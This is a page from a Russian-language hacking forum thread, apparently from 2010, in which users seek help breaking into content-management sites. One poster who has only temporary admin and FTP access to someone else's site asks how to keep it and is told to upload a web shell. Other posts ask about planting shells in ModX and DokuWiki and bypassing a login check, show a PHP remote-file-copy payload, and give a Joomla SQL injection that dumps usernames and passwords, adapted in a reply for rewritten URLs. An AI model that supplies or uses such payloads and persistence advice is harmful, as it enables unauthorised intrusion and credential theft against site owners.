ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 21.01.2010, 20:30
globalDJs
Новичок
Регистрация: 05.04.2009
Сообщений: 1
Провел на форуме:
4712

Репутация: 0
По умолчанию

Привет всем. у меня вопрос качательно сайта стоящего на дле восьмой версии. Короче у меня сейчас еасть доступ к его админ панели и к FTP но это временно, на пару дней примерно еще, вопросто стоит в том, что можно ли чего сделать, чтобы в будущем, иметь хотяб доступ к админке....ну может воткнуть скрипт какой или еще чего?! спасибо заранее за помощь.
 
Ответить с цитированием

  #232  
Старый 22.01.2010, 12:51
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Залей шелл.

Какой тип шифрование в пхпбб3, TBDev v.3.0, дле 8.2, phpfusion.Спасибо.

Последний раз редактировалось wkar; 22.01.2010 в 17:50..
 
Ответить с цитированием

  #233  
Старый 31.01.2010, 20:33
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

//сцк,снова 2 символа
про хеши - читай:
Цитата:
http://forum.antichat.ru/thread155032.html
 
Ответить с цитированием

  #234  
Старый 19.02.2010, 21:51
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

Поимел шел на серваке, установлена CMS ModX
Где там можно редактировать тэмплэйт шелом? Через админку не интересует.

Спасибо!
 
Ответить с цитированием

  #235  
Старый 23.02.2010, 01:00
cj69
Новичок
Регистрация: 18.02.2010
Сообщений: 5
Провел на форуме:
7718

Репутация: 0
По умолчанию

Всем привет, есть народ который с Openx встречался?
тестирую опенх 2.8.0 на локалхосте - http://forum.antichat.ru/thread150144.html

вставлаю в баннер код типа <?copy('http://localhost/1.txt', 'x.php');?>test (премисии есть)
просматриваю баннер. В броузаке вижу "тест", но х.php отсутствует(GET в access.log тоже нема). Мысли по этому поводу?
 
Ответить с цитированием

  #236  
Старый 25.02.2010, 00:24
cryostat13
Новичок
Регистрация: 14.02.2010
Сообщений: 1
Провел на форуме:
10749

Репутация: 0
По умолчанию

Есть сайт с движком HYIP Manager Script подскажите как использовать forwarding для forgot_password. Или как составитить правильный запрос для авторизации без проверки вот я как делаю но не получается
$q = 'select * from hm2_users where id = 1' $row["username"];
 
Ответить с цитированием

  #237  
Старый 18.04.2010, 16:54
GC0mmander
Новичок
Регистрация: 27.12.2009
Сообщений: 8
Провел на форуме:
9139

Репутация: 0
По умолчанию

Есть ли какой-нибудь способ заливки шелла через DokuWiki?
 
Ответить с цитированием

  #238  
Старый 22.04.2010, 11:46
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

День добрый, есть сайт на движке Joomla RE 1.0.8.1 Есть на него что-нибудь? про плагины ничего пока не знаю.
 
Ответить с цитированием

  #239  
Старый 08.05.2010, 22:44
iSlava
Познающий
Регистрация: 24.08.2009
Сообщений: 67
Провел на форуме:
137206

Репутация: 10
По умолчанию

у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blah id=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
 
Ответить с цитированием

  #240  
Старый 10.05.2010, 18:24
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Цитата:
Сообщение от iSlava  
у джумлы адрес обычно выглядит таким:
index.php?option=com_module&vulnerable_id=178&Blah id=91356
и vulnerable_id - подвержен sql инъекции
как обычно:
-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--
столкнулся с таким видом:
/component/option,com_module/vulnerable_id,178/Blahid,91356/
какой тогда вид скуль запроса должен быть?
Кажется тут заюзан модуль apache: mod_rewrite. Исходя из написанного тобой выше может иметь место следующий запрос:
/component/option,com_module/vulnerable_id,-1+UNION+ALL+SELECT+1,2,version(),4,group_concat(us ername,0x3a,password,0x3a,usertype,0x3c62723e),6,. ...N+from+jos_users--/Blahid,91356/
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Форумы 316 08.06.2010 09:56
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP, PERL, MySQL, JavaScript 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ